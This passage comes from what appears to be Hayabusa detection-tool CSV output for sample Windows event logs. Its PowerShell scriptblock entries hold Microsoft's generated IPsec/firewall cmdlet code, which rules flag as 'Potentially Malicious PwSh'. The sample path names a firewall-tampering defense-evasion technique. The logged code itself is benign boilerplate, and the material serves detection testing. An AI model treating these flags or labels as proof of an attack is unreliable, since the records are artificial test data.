($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 